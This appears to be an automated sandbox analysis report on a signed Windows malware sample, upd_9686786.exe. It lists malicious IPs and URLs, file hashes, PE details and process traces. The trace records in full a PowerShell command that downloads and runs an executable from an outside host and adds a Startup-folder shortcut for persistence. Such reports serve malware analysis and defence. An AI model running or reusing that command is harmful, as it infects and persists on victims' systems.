217.148.142.19 | upd_8816295.exe | malicious | Unknown
217.148.142.19 | upd_4299382.exe | malicious | Unknown
172.67.178.253 | upd_4299382.exe | malicious | Unknown
65.109.226.176 | SecuriteInfo.com.Win64.Evo-gen.4832.25615.exe | malicious | Unknown
65.109.226.176 | SecuriteInfo.com.Win64.Evo-gen.4832.25615.exe | malicious | Unknown
65.109.226.176 | upd_1416836.exe | malicious | Unknown
65.109.226.176 | upd_8816295.exe | malicious | Unknown
65.109.226.176 | upd_1416836.exe | malicious | Unknown
65.109.226.176 | upd_8816295.exe | malicious | Unknown
65.109.226.176 | upd_4299382.exe | malicious | Unknown
                                                                                                                  No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
PROFESIONALHOSTINGES | SecuriteInfo.com.Win64.Evo-gen.4832.25615.exe | malicious | Unknown | 217.148.142.19
PROFESIONALHOSTINGES | SecuriteInfo.com.Win64.Evo-gen.4832.25615.exe | malicious | Unknown | 217.148.142.19
PROFESIONALHOSTINGES | upd_1416836.exe | malicious | Unknown | 217.148.142.19
PROFESIONALHOSTINGES | upd_8816295.exe | malicious | Unknown | 217.148.142.19
PROFESIONALHOSTINGES | upd_1416836.exe | malicious | Unknown | 217.148.142.19
PROFESIONALHOSTINGES | upd_8816295.exe | malicious | Unknown | 217.148.142.19
PROFESIONALHOSTINGES | upd_4299382.exe | malicious | Unknown | 217.148.142.19
PROFESIONALHOSTINGES | https://agromur.es/spass/login.php | malicious | Unknown | 185.177.154.5
PROFESIONALHOSTINGES | https://vinilosyrotulos.es/modules/orderfiles/files/xsamxadoo/FS/N/login | malicious | Unknown | 217.148.136.200
PROFESIONALHOSTINGES | OUdtOLl0w4.elf | malicious | Mirai | 185.92.246.39
SRS-6-Z-7381US | PurchaseXOrderXPO16145.xls | malicious | Unknown | 65.38.120.86
SRS-6-Z-7381US | PurchaseXOrderXPO16145.xls | malicious | Unknown | 65.38.120.86
SRS-6-Z-7381US | PurchaseXOrderXPO16145.xls | malicious | Unknown | 65.38.120.86
SRS-6-Z-7381US | SecuriteInfo.com.Win64.Evo-gen.4832.25615.exe | malicious | Unknown | 65.38.120.47
SRS-6-Z-7381US | SecuriteInfo.com.Win64.Evo-gen.4832.25615.exe | malicious | Unknown | 65.38.120.47
SRS-6-Z-7381US | upd_1416836.exe | malicious | Unknown | 65.38.120.47
SRS-6-Z-7381US | upd_8816295.exe | malicious | Unknown | 65.38.120.47
SRS-6-Z-7381US | upd_1416836.exe | malicious | Unknown | 65.38.120.47
SRS-6-Z-7381US | upd_8816295.exe | malicious | Unknown | 65.38.120.47
SRS-6-Z-7381US | Modulo32 (2).jar | malicious | Unknown | 65.38.120.211
CLOUDFLARENETUS | Prismifyr-Install.exe | malicious | Node Stealer | 172.67.74.152
CLOUDFLARENETUS | Prismifyr-Install.exe | malicious | Node Stealer | 104.26.12.205
CLOUDFLARENETUS | moba-24.2-installer_M64ZB-1.exe | malicious | PureLog Stealer | 104.22.74.216
CLOUDFLARENETUS | Audio_Msg..00299229202324Transcript.html | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | file.exe | malicious | LummaC, Stealc, Vidar | 172.67.183.74
CLOUDFLARENETUS | file.exe | malicious | LummaC | 104.21.77.132
CLOUDFLARENETUS | moba-24.2-installer_M64ZB-1.exe | malicious | PureLog Stealer | 104.18.20.226
CLOUDFLARENETUS | https://wetransfer.com/downloads/fc718a7028ccd1e273879a61c0883fe420241001145250/8110e2eb5f5a56cc2015d1b3243d9b3120241001145309/33d289?trk=TRN_TDL_01&utm_campaign=TRN_TDL_01&utm_medium=email&utm_source=sendgrid | malicious | HTMLPhisher | 172.64.151.101
CLOUDFLARENETUS | https://k7qo.sarnerholz.cam/APRjVfmk | malicious | Unknown |
                                                                                                                  • 172.67.179.163
                                                                                                                  ELECTRONIC RECEIPT_Opcsa.htmlGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                                  • 172.67.74.152
                                                                                                                  ALABANZA-BALTUShttps://linke.to/pkmlogisticsGet hashmaliciousUnknownBrowse
                                                                                                                  • 65.109.83.59
                                                                                                                  http://hdelm7ye84n38d9lvch0ev4c0.js.wpuserpowered.com/Get hashmaliciousUnknownBrowse
                                                                                                                  • 65.109.119.234
                                                                                                                  SWIFT_PDF.exeGet hashmaliciousRemcosBrowse
                                                                                                                  • 64.176.178.205
                                                                                                                  PO904321.exeGet hashmaliciousRemcosBrowse
                                                                                                                  • 64.176.178.205
                                                                                                                  0988986.exeGet hashmaliciousRemcosBrowse
                                                                                                                  • 64.176.178.205
                                                                                                                  YJIznOmBnQ.ps1Get hashmaliciousNetSupport DownloaderBrowse
                                                                                                                  • 65.108.196.136
                                                                                                                  gYkk20cK3U.ps1Get hashmaliciousNetSupport DownloaderBrowse
                                                                                                                  • 65.108.196.136
                                                                                                                  YB4glv2lGj.ps1Get hashmaliciousNetSupport DownloaderBrowse
                                                                                                                  • 65.108.196.136
                                                                                                                  GxYt5Gt7c6.ps1Get hashmaliciousNetSupport DownloaderBrowse
                                                                                                                  • 65.108.196.136
                                                                                                                  rdOqlg6UQp.ps1Get hashmaliciousNetSupport DownloaderBrowse
                                                                                                                  • 65.108.196.136
                                                                                                                  No context
                                                                                                                  No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Preview: @...e...........................................................

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Tue Oct 1 10:19:13 2024, mtime=Tue Oct 1 16:19:43 2024, atime=Tue Oct 1 16:19:40 2024, length=92408, window=hide
Category: dropped
Size (bytes): 659
Entropy (8bit): 4.988690184865966
Encrypted: false
SSDEEP: 12:8mF+l8ChzYNbRnmoSlA88C0djA2Z6yRlaqw7PlmCt:8m4l8ZnnmAm0ZA+6w8m
MD5: CB5E59797EF5AEBAAA1CDF54CA3FBD96
SHA1: 0E67E31080C0B0623A31836A70D155F545A9BFE1
SHA-256: C23E240A88CEFDB51BB0B5BE4ED58B7EB8CE00FB73C1DF460AB70EB24E4FE816
SHA-512: 0D666904A488AEB8AAE57DC5D0FBCD611B4D7E3B4D9FD516CA44A0A3E7E74AF43AA821DAA6F401C6D2AB7F94FAD237BB60A013D5E1638C4210F65C2F8F6B6071
Malicious: true
Preview: L..................F.... ...a;..........&....oc.&....h...........................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....6......G..&.....l.2..h..AYu. .UPD_96~1.EXE..P......AYgZAYu.....e.....................>...u.p.d._.9.6.8.6.7.8.6...e.x.e.......V...............-.......U.............H......C:\Users\user\Desktop\upd_9686786.exe..,.....\.....\.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.u.p.d._.9.6.8.6.7.8.6...e.x.e...C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.D.e.s.k.t.o.p.`.......X.......287400..............n4UB.. .|..o.v.......A.P..#.....n4UB.. .|..o.v.......A.P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

File type: PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit): 6.564982781459938
TrID:
• Win64 Executable (generic) (12005/4) 74.95%
• Generic Win/DOS Executable (2004/3) 12.51%
• DOS Executable Generic (2002/1) 12.50%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name: upd_9686786.exe
File size: 92'408 bytes
MD5: 22f545cf93f55d3294abbbc7bfbbd6b8
SHA1: 9f3fcce983368fe70ddf070919f2516981934885
SHA256: b93d7961d05376e6aa0e6d122ae50f34db078acc9e95ed6408f39750d386a74a
SHA512: 8dc07b8ee3fa90316ef67283b96f87a1e664388698973af325f73217e896877272c03c9589cd9ca2ef6029e95c89fd89e7f064dd126449e2a9c18ec20e72d64a
SSDEEP: 1536:+XzqM7EOkXqampZzmvzqzYgM3djwbymSiIjDe1p8t63/jH:IYPXqZmvzqzC9wxR1yMj
TLSH: 37937DA3595535E6F40714B488E3D38A0B38FFB4979295DD31D83D3C7BE28E88628792
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.@........&....*.`.....................@..........................................`... ............................
Icon Hash: 0f538594b2676d17
Entrypoint: 0x140001000
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x140000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x66DEED9B [Mon Sep 9 12:44:11 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 970725500d4c590551cb7610a5fb002e
Signature Valid: true
Signature Issuer: CN=Certum Extended Validation Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL
Signature Validation Error: The operation completed successfully
Error Number: 0
Not Before: 03/09/2024 10:28:18
Not After: 03/09/2025 10:28:17
Subject Chain:
• CN="Foshan Yongqiheng Trading Co., Ltd.", O="Foshan Yongqiheng Trading Co., Ltd.", L=Foshan, S=Guangdong, C=CN, SERIALNUMBER=91440605MA55WQT94L, OID.1.3.6.1.4.1.311.60.2.1.1=Foshan, OID.1.3.6.1.4.1.311.60.2.1.2=Guangdong, OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization
Version: 3
Thumbprint MD5: 272EC0528A8BC9E66763B3D4B60C3E4B
Thumbprint SHA-1: 36A0F423C1FA48F172E4FECD06B8099F0EBBAEB8
Thumbprint SHA-256: CB2C8BD38AEF6CA2150B078285758AC1F6A2A8BA36E7A315E4B8300974A13B6B
Serial: 672237253A9B7EF9D02D7D1CB27A3FF4

Instruction
dec eax
sub esp, 00000638h
dec eax
lea ebp, dword ptr [esp+00000200h]
dec eax
lea edx, dword ptr [00000551h]
push edx
dec eax
lea edx, dword ptr [00000002h]
push edx
ret
push ebp
dec eax
mov ebp, esp
dec eax
sub esp, 60h
cmp cx, 137Bh
jne 00007F9128435731h
dec esp
mov dword ptr [ebp-5Bh], eax
dec esp
or dword ptr [ebp-35h], edx
mov ecx, dword ptr [ebp-5Fh]
dec esp
add eax, dword ptr [ebp-18h]
dec eax
mov dword ptr [ebp-32h], edx
cmp edx, 51F34DF3h
je 00007F9128435726h
dec esp
mov dword ptr [ebp-1Fh], edx
dec ecx
mov ebx, ecx
dec esp
add dword ptr [ebp-23h], ecx
dec ebp
cmp ecx, eax
jmp 00007F912843582Bh
call 00007F9128435A4Ch
mov dword ptr [ebp-42h], edx
dec ecx
sub edx, 0000B833h
xor ecx, edx
dec eax
sub eax, dword ptr [00005F8Dh]
dec eax
mov dword ptr [ebp-0Bh], edx
mov edx, dword ptr [00005F87h]
lea edx, dword ptr [00005F86h]
dec eax
mov edx, dword ptr [ebp-4Eh]
mov eax, 0000C14Ch
dec esp
                                                                                                                  sub eax, dword ptr [ebp-12h]
                                                                                                                  cmp eax, dword ptr [00005F6Fh]
                                                                                                                  jne 00007F9128435744h
                                                                                                                  dec esp
                                                                                                                  add dword ptr [00005F66h], ebx
                                                                                                                  dec ebp
                                                                                                                  mov edx, eax
                                                                                                                  mov cl, byte ptr [ebp-34h]
                                                                                                                  mov edx, eax
                                                                                                                  add edx, 0000873Eh
                                                                                                                  dec ebp
                                                                                                                  mov ecx, edx
                                                                                                                  add ecx, ecx
                                                                                                                  dec esp
                                                                                                                  mov dword ptr [ebp-4Fh], ebx
                                                                                                                  dec esp
                                                                                                                  mov dword ptr [ebp-53h], ebx
                                                                                                                  dec esp
                                                                                                                  mov dword ptr [ebp-0Bh], edx
                                                                                                                  mov dword ptr [ebp-59h], eax
                                                                                                                  mov ecx, 0000593Eh
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xc000           0x140         .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xd000           0x9e38        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x14000          0x28f8        .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x17000          0x8c          .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0xc080           0x40          .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy            Characteristics
.text   0x1000           0x5e70        0x6000    ee60c30397ec0937ce6efca219e666df  False     0.6846923828125     data       6.132032476401386  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data   0x7000           0x11f0        0x1200    3272739aedcb22a2fb1771a34e5495ec  False     0.4409722222222222  data       4.693899156508856  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata  0x9000           0x2530        0x2600    2a37e4106e4c51e925f62df186175948  False     0.6062911184210527  data       5.042837533503447  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata  0xc000           0x140         0x200     c620907a6266d59213fe2218e4a2e6c6  False     0.28515625          data       2.123589479505298  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0xd000           0x9e38        0xa000    ed6b679ce9904e4382dd5e34b6ed6603  False     0.3566650390625     data       5.727163119406358  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x17000          0x8c          0x200     2fb7b3429ddc1b32b72c3399054c02d8  False     0.291015625         data       1.827351060008176  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size    Type                                                                 Language  Country        ZLIB Complexity
RT_ICON        0xd140   0x94a8  Device independent bitmap graphic, 96 x 192 x 32, image size 36864  English   United States  0.3554235862938827
RT_GROUP_ICON  0x165e8  0x14    data                                                                 English   United States  1.15
RT_VERSION     0x16600  0x314   data                                                                 English   United States  0.41624365482233505
RT_MANIFEST    0x16918  0x51f   XML 1.0 document, ASCII text                                         English   United States  0.3707093821510298
DLL           Import
KERNEL32.dll  ExitProcess, GetProcAddress, LoadLibraryA
msvcrt.dll    getenv, rand, srand
Language of compilation system  Country where language is spoken  Map
English                         United States
                                                                                                                  Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.


                                                                                                                  Target ID:0
                                                                                                                  Start time:13:19:40
                                                                                                                  Start date:01/10/2024
                                                                                                                  Path:C:\Users\user\Desktop\upd_9686786.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\Desktop\upd_9686786.exe"
                                                                                                                  Imagebase:0x7ff76e650000
                                                                                                                  File size:92'408 bytes
                                                                                                                  MD5 hash:22F545CF93F55D3294ABBBC7BFBBD6B8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  Target ID:2
                                                                                                                  Start time:13:19:49
                                                                                                                  Start date:01/10/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()"
                                                                                                                  Imagebase:0x7ff7fdba0000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:3
                                                                                                                  Start time:13:19:49
                                                                                                                  Start date:01/10/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:cmd.exe /c systeminfo
                                                                                                                  Imagebase:0x7ff6092b0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:4
                                                                                                                  Start time:13:19:49
                                                                                                                  Start date:01/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6c1c60000
                                                                                                                  File size:875'008 bytes
                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:5
                                                                                                                  Start time:13:19:49
                                                                                                                  Start date:01/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6c1c60000
                                                                                                                  File size:875'008 bytes
                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:6
                                                                                                                  Start time:13:19:49
                                                                                                                  Start date:01/10/2024
                                                                                                                  Path:C:\Windows\System32\systeminfo.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:systeminfo
                                                                                                                  Imagebase:0x7ff7493d0000
                                                                                                                  File size:110'080 bytes
                                                                                                                  MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  Target ID:8
                                                                                                                  Start time:13:20:01
                                                                                                                  Start date:01/10/2024
                                                                                                                  Path:C:\Users\user\Desktop\upd_9686786.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\Desktop\upd_9686786.exe"
                                                                                                                  Imagebase:0x7ff76e650000
                                                                                                                  File size:92'408 bytes
                                                                                                                  MD5 hash:22F545CF93F55D3294ABBBC7BFBBD6B8
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  Target ID:9
                                                                                                                  Start time:13:20:09
                                                                                                                  Start date:01/10/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()"
                                                                                                                  Imagebase:0x7ff7fdba0000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:10
                                                                                                                  Start time:13:20:09
                                                                                                                  Start date:01/10/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:cmd.exe /c systeminfo
                                                                                                                  Imagebase:0x7ff6092b0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:11
                                                                                                                  Start time:13:20:09
                                                                                                                  Start date:01/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6c1c60000
                                                                                                                  File size:875'008 bytes
                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:12
                                                                                                                  Start time:13:20:09
                                                                                                                  Start date:01/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6c1c60000
                                                                                                                  File size:875'008 bytes
                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:13
                                                                                                                  Start time:13:20:09
                                                                                                                  Start date:01/10/2024
                                                                                                                  Path:C:\Windows\System32\systeminfo.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:systeminfo
                                                                                                                  Imagebase:0x7ff7493d0000
                                                                                                                  File size:110'080 bytes
                                                                                                                  MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true


                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:7.7%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:14.3%
                                                                                                                    Total number of Nodes:70
                                                                                                                    Total number of Limit Nodes:12
                                                                                                                    execution_graph 1053 7ff76e655d77 CreateProcessA 1054 7ff76e653428 1058 7ff76e6550b5 1054->1058 1056 7ff76e65342d malloc 1057 7ff76e653478 1056->1057 1059 7ff76e6550c4 1058->1059 1059->1056 1060 7ff76e655a5a 1061 7ff76e655a70 1060->1061 1062 7ff76e655a60 1060->1062 1062->1061 1063 7ff76e65568f recv 1062->1063 1064 7ff76e6556f1 1063->1064 1099 7ff76e65450a 1100 7ff76e65568b recv 1099->1100 1101 7ff76e65451d 1100->1101 1102 7ff76e653b72 SleepEx 1101->1102 1106 7ff76e654526 1101->1106 1103 7ff76e653e59 socket 1102->1103 1104 7ff76e653b90 1102->1104 1109 7ff76e653e7c 1103->1109 1105 7ff76e653e3e closesocket 1104->1105 1108 7ff76e653b96 1104->1108 1105->1103 1107 7ff76e65568b recv 1106->1107 1106->1109 1107->1109 1110 7ff76e653b6a 1111 7ff76e653b72 SleepEx 1110->1111 1112 7ff76e653e59 socket 1111->1112 1113 7ff76e653b90 1111->1113 1116 7ff76e653e7c 1112->1116 1114 7ff76e653e3e closesocket 1113->1114 1115 7ff76e653b96 1113->1115 1114->1112 1065 7ff76e652514 CreatePipe 1066 7ff76e6525ad 1065->1066 1067 7ff76e654196 connect 1068 7ff76e653b72 SleepEx 1067->1068 1072 7ff76e6541bc 1067->1072 1069 7ff76e653e59 socket 1068->1069 1070 7ff76e653b90 1068->1070 1074 7ff76e653e7c 1069->1074 1071 7ff76e653e3e closesocket 1070->1071 1073 7ff76e653b96 1070->1073 1071->1069 1075 7ff76e654c66 1076 7ff76e65450a 1075->1076 1077 7ff76e654c71 1075->1077 1088 7ff76e65568b 1076->1088 1079 7ff76e65451d 1080 7ff76e654526 1079->1080 1081 7ff76e653b72 SleepEx 1079->1081 1085 7ff76e65568b recv 1080->1085 1087 7ff76e653e7c 1080->1087 1082 7ff76e653e59 socket 1081->1082 1083 7ff76e653b90 1081->1083 1082->1087 1084 7ff76e653e3e closesocket 1083->1084 1086 7ff76e653b96 1083->1086 1084->1082 1085->1087 1089 7ff76e65568f recv 1088->1089 1090 7ff76e6556f1 1089->1090 1090->1079 1117 7ff76e6543ef 1118 7ff76e65440d 1117->1118 1119 7ff76e653b72 SleepEx 1118->1119 1123 7ff76e654417 1118->1123 
1120 7ff76e653e59 socket 1119->1120 1121 7ff76e653b90 1119->1121 1125 7ff76e653e7c 1120->1125 1122 7ff76e653e3e closesocket 1121->1122 1124 7ff76e653b96 1121->1124 1122->1120 1091 7ff76e6537d0 1092 7ff76e653a8d ReadFile 1091->1092 1093 7ff76e653ad9 1092->1093 1094 7ff76e6542d2 1098 7ff76e6550ad 1094->1098 1096 7ff76e6542f0 send 1097 7ff76e65435c 1096->1097

                                                                                                                    Callgraph

